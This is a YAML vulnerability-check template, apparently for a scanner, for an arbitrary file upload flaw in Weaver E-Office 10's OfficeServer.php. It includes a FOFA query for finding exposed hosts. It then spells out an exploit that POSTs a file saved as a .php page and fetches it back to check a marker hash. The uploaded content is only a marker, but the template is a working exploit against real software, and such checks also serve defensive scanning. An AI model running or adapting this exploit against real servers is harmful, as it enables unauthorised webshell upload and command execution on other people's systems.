product: 泛微E-Office
vName: 泛微 E-Office10 OfficeServer文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 泛微e-ofice是一款标准化的协同0A办公软件，泛微 E-ofice 10 0ficeServer 存在任意文件上传漏洞，攻击者可以上传任意文件，获取webshell，在服务器上执行任意命令、读取敏感信息等
version: ''
note: ''
search:
  FOFA: app="泛微-EOffice"
protocol: http
link: https://blog.csdn.net/qq_56698744/article/details/133943903
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /eoffice10/server/public/iWebOffice2015/OfficeServer.php
      file:
        Filedata:
          - 52e039302a62d077.jpg
          - 95cc64dd2825f9df13ec4ad683ecf339
          - image/jpeg
      dataJson:
        FormData: { 'USERNAME': '','RECORDID': 'undefined','OPTION': 'SAVEFILE','FILENAME': '52e039302a62d077.php' }
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          header:
            value:
              - text/html
            logic: and
  - exp:
      method: get
      follow: false
      path: /eoffice10/server/public/iWebOffice2015/Document/52e039302a62d077.php
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: 'and'